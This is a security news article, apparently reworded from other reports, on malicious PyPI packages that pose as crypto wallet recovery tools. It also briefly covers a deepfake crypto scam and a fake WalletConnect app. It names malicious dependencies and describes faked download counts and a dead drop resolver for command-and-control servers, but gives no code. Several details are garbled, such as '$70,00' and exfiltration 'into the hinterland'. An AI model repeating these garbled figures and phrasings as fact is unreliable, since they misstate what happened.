During an investigation conducted recently, it was discovered that several malicious packages masquerading as services for recovering cryptocurrency wallets were found in the Python Package Index repository, revealing that they were spying on sensitive personal information and helping to steal cryptocurrency.
A Checkmarx researcher described the attack as targeting Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and many other prominent wallets within the crypto ecosystem in a report released on Tuesday.
It was found that the packages presented themselves as tools that could extract mnemonic phrases and decrypt wallet data, suggesting that they could provide value to cryptocurrency users who are looking to recover or manage wallets"
As long as cryptocurrencies remain a prime target for cybercriminals, they will continue to thrive in the ecosystem.
The recent discovery of malicious packages located on the Python Package Index (PyPI) repository in the Python distribution has led to several tools that masquerade as tools that can help recover and manage crypto wallets. It is a fake tool that is used to steal sensitive information from users and facilitate the theft of valuable digital assets, among other things.
According to Checkmarx researchers, there have been several malicious Python packages found on PyPI that attack users of leading cryptocurrency wallets like Atomic, Trust Wallet, MetaMask, Ronin, TronLink, and Exodus, as well as other popular apps. According to Checkmarx, the names of the packages in the Cryptocurrency ecosystem packages are deliberate efforts aimed at luring developers who are active in cryptocurrency ecosystems.
The package descriptions on PyPI also came with links to installation instructions, examples on how to use them, and in one case, even an explanation of the "best practices" for virtual environments for installation. Again, this was meant to lend legitimacy to the libraries.
Furthermore, the threat actor behind the campaign did more than simply deceive users about the popularity of the packages within the campaign, as they also displayed false download statistics, creating the impression that the packages were trustworthy and popular.
In the identified PyPI packages, there was a dependency called cipherbcryptors that was required for the malicious code to be executed while in a few other cases, the Malware relied on ccl_leveldbases, which seemed to be an attempt to obfuscate the functionality by using another package.
This is an important point to note in the case of the malicious functionality in the packages since the malicious functionality is only activated when certain functions are called, which is a departure from the typical pattern where such behaviour would be activated automatically by the installed package upon installation.
An end-to-end process is then used to exfiltrate the data from the remote server into the hinterland.
As Gelb explains, the attacker deployed an additional layer of security as he did not hard-code the address of their command-and-control server into any of the packages that were distributed. They had to rely on external sources to retrieve the information in a dynamic way rather than using internal resources.
A technique commonly referred to as a dead drop resolver provides attackers with the flexibility to update the server information without having to update the packages themselves to take advantage of this type of attack.
Furthermore, should the servers have to be taken down, it will make the process of switching between server infrastructures as simple as possible.
This information has been collected to determine whether the attackers as part of their strategy to lure developers and end users will be successful. The author provides a great deal of information about the packages, including detailed descriptions, installation instructions, usage examples, and even best practices for running virtual machines at home. The hackers also manipulated download statistics to mislead the users into believing that the program was popular and trustworthy.
It is noteworthy that the attackers used a technique known as a dead drop resolver to retrieve the addresses of their command and control servers efficiently. As a result of not hard-coding the server addresses within the packages, they will be able to update information about the servers without having to push new package versions, so security measures will be unable to detect and block the server updates.
There was a recent discovery of fake crypto wallet recovery tools on PyPI. This underlines how cybercriminals are continuously evolving their tactics to target cryptocurrency and the crypto sector as a whole.
The developers and users are equally responsible for safeguarding their digital assets, ensuring they are vigilant, practising due diligence when installing software packages, and utilizing security solutions such as Vulert to protect their assets.
According to details revealed in August 2024, CryptoCore, an elaborate cryptocurrency scam that uses fake videos or hijacked accounts on social media platforms such as Facebook, Twitch, X, and YouTube as a method of tying users into selling their crypto assets under the guise of fast and easy profits, has been operating since August 2024.
"This scam group and its giveaway campaigns will deceive users into sending their cryptocurrencies to the scammers' wallets by using deepfake technology, hijacked YouTube accounts, and professionally designed websites to deceive them into sending their cryptocurrencies to the scammers' wallets," Avast researcher Martin Chlumecký said.
The most common way for scammers to convince potential victims that messages or events published online are official communications from trusted social media accounts or event pages is to persuade them to believe what is being posted online can be trusted. As a result, they can profit from the trust attached to the chosen brand, person, or event.
Last week, a rogue Android app was impersonating the genuine WalletConnect protocol, which was used by the malware to steal around $70,00 in cryptocurrency by initiating fraudulent transactions from infected devices, as revealed by Check Point.